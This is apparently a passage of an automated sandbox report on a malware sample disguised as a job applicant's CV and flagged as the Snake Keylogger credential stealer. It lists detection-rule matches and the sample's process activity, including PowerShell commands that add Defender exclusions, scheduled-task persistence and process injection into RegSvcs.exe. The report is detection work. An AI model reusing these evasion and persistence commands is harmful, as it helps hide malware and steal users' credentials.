                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563256817_2_05632568
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563D54817_2_0563D548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563D55817_2_0563D558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563255817_2_05632558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563DDF917_2_0563DDF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563547817_2_05635478
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_05631CA817_2_05631CA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_05631C9917_2_05631C99
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563EF6817_2_0563EF68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563EF5817_2_0563EF58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_05638FF017_2_05638FF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563978817_2_05639788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563DE0817_2_0563DE08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563E6A817_2_0563E6A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563E6B817_2_0563E6B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563D10017_2_0563D100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563210817_2_05632108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_056329C817_2_056329C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563D9A117_2_0563D9A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563D9B017_2_0563D9B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_056329B817_2_056329B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563A07617_2_0563A076
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563004017_2_05630040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563184817_2_05631848
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563183817_2_05631838
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563900017_2_05639000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563000717_2_05630007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563F80A17_2_0563F80A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563F81817_2_0563F818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563D0EF17_2_0563D0EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_056320F917_2_056320F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_05630B3017_2_05630B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563EB0217_2_0563EB02
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563EB1017_2_0563EB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_05630B1F17_2_05630B1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563F3C017_2_0563F3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563F3B117_2_0563F3B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563E26017_2_0563E260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0563E25017_2_0563E250
                Source: Kayla Dennis CV.exeStatic PE information: invalid certificate
                Source: Kayla Dennis CV.exe, 00000000.00000002.2131860326.0000000003421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Kayla Dennis CV.exe
                Source: Kayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004632000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Kayla Dennis CV.exe
                Source: Kayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Kayla Dennis CV.exe
                Source: Kayla Dennis CV.exe, 00000000.00000002.2141144044.00000000068F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Kayla Dennis CV.exe
                Source: Kayla Dennis CV.exe, 00000000.00000002.2142467699.00000000084F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Kayla Dennis CV.exe
                Source: Kayla Dennis CV.exe, 00000000.00000002.2126394487.000000000160E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Kayla Dennis CV.exe
                Source: Kayla Dennis CV.exeBinary or memory string: OriginalFilenameXDRa.exe: vs Kayla Dennis CV.exe
                Source: Kayla Dennis CV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Kayla Dennis CV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: lyKbfEsVYfQfU.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, -j--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, -j--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, -j--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, -j--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, --.csBase64 encoded string: 'L/R25pD93jLO+3E3+VbbruzFB+w8ATIgUswH8PVgmZqSxh5DvX1ttLV5ijFT/hS2'
                Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, --.csBase64 encoded string: 'L/R25pD93jLO+3E3+VbbruzFB+w8ATIgUswH8PVgmZqSxh5DvX1ttLV5ijFT/hS2'
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, i0WcuiQWSwH93uGufO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, w1Wamsg80XvcbX1PDi.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, w1Wamsg80XvcbX1PDi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, w1Wamsg80XvcbX1PDi.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, w1Wamsg80XvcbX1PDi.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, w1Wamsg80XvcbX1PDi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, w1Wamsg80XvcbX1PDi.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, i0WcuiQWSwH93uGufO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/15@2/2
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeFile created: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMutant created: \Sessions\1\BaseNamedObjects\JRXKrmcGlcGytWAcekV
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeFile created: C:\Users\user\AppData\Local\Temp\tmp796.tmpJump to behavior
                Source: Kayla Dennis CV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Kayla Dennis CV.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 0000000B.00000002.3288992952.0000000003213000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003265000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003223000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003231000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3293827844.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003259000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3295153780.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Kayla Dennis CV.exeReversingLabs: Detection: 29%
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeFile read: C:\Users\user\Desktop\Kayla Dennis CV.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Kayla Dennis CV.exe "C:\Users\user\Desktop\Kayla Dennis CV.exe"
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: msdmo.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeSection loaded: amsi.dllJump to behavior
